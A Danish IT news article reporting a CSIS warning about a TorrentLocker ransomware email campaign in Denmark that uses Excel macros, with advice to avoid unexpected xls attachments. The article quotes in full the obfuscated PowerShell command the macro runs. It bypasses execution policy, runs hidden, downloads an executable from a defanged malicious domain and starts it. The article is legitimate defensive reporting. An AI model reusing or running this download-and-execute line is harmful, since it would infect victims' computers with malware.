Danmark ramt af nyt ransomware-angreb: Du skal ikke åbne denne mail

Danmark rammes i disse dage af en bølge af ondsindet ransomware, der kan låse din computers filer.

Artikel top billede

Danmark er mål for endnu en spamkampagne fra it-kriminelle, der bærer en ransomware i Torrentlocker-familien.

Det skriver sikkerhedsfirmaet CSIS i en sikkerhedsadvarsel.

Den ondsindede email ligner de fleste andre spam-emails for tiden med en tilsyneladende personlig besked på dansk og et tilknyttet Excel-dokument.

Hvis denne fil åbnes af en uforsigtig modtager og får en tilknyttet makrokode aktiveret ved at slå Excels beskyttelsestilstand fra, vil brugeren ende med en krypteret computer.

Du kan se et eksempel på mailen i toppen af artiklen. 

Aktiveres automatisk 

Makrokoden henter automatisk selve ransomware-programmet ned fra et ondsindet domæne, der via Windows' powershell-framework henter ransomware i Torrentlocker-klassen ned og afvikler programmet.

Det vil resultere i en låst computer og formodentligt et krav om en løsesum.

Funktionen ses udført via følgende powershell i en sikret form fra CSIS:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.exE -ExeCuTiONPoliCY BYpaSS -nOProfilE -WIndoWsTyle hiddeN (nEw-objeCT SySTEM.NET.WeBcLIeNt).dOWnLoadFIle('http://ltmp.applepice[.]pl/file/set.rte','C:\Users\[%brugerkonto%]\AppData\Roaming.eXE');staRT-PrOcESS 'C:\Users\[%brugerkonto%]\AppData\Roaming.EXe'

Alle bør derfor være opmærksomme, hvis de modtager en mail med et enkeltstående xls-dokument, der ikke giver mening, og særligt hvis det kommer fra en ukendt email-adresse.

Angrebet minder i høj grad som et lignende angreb fra sidste uge, hvor ransomwaren blev aktiveret af en vedhæftet zip-fil.

Det fik i sidste uge CSIS til at højne sin trusselvurdering til 4 ud af 5.  

Læs også: Sikkerhedsfirma advarer: Målrettet ransomware-kampagne skyller ind over Danmark

Læses lige nu

    Event: Cyber Security Festival 2026

    Sikkerhed | København

    Mød Danmarks skrappeste it-sikkerhedseksperter og bliv klar til at planlægge og eksekvere en operationel og effektiv cybersikkerhedsstrategi, når vi åbner dørene for +1.700 it-professionelle. Du kan glæde dig til oplæg fra mere end 70 talere og møde mere end 50 leverandører over to dage.

    18 & 19 november 2026 | Gratis deltagelse

    Navnenyt fra it-Danmark

    Lauren De Ventura,  emagine Expertise A/S, er pr. 1. juli 2026 udnævnt som Chief People Officer, fast del af den globale ledelse og bestyrelsesmedlem. Hun er uddannet HR-ledelse på tværs af konsulent-, staffing- og IT-branchen. Hun beskæftiger sig med skabe rammerne for emagine som et sted, hvor IT-talenter kan opbygge meningsfulde karrierer. Udnævnelse

    Lauren De Ventura

    emagine Expertise A/S

    netIP har pr. 1. juni 2026 ansat Heidi Winther som Supportkonsulent ved netIP's kontor i Herning. Hun kommer fra en stilling som IT-Supporter hos Holstebro Kommune. Nyt job
    Renewtech ApS har pr. 1. april 2026 ansat Boris Sudar som Senior IT Specialist. Han skal især beskæftige sig med at sikre, at Renewtech cloudbaseret infrastruktur fortsætter på sit højeste niveau, mens han også skal drive system udvikling. Han kommer fra en stilling som Senior IT Specialist hos Eurowind Energy. Han har tidligere beskæftiget sig med Microsoft 365, Intune og sikker endepunktsstyring for hybrid og cloudbaseret infrastrukturer. Nyt job

    Boris Sudar

    Renewtech ApS

    Sharp Consumer Electronics har pr. 1. april 2026 ansat Daniel Eriksson som salgsdirektør for de nordiske lande. Han skal især beskæftige sig med at accelerere virksomhedens vækst i Norden. Han kommer fra en stilling som nordisk salgsdirektør hos Hisense. Han har tidligere beskæftiget sig med detailhandel, kommerciel strategi og markedsudvidelser med bemærkelsesværdige resultater til følge. Nyt job

    Daniel Eriksson

    Sharp Consumer Electronics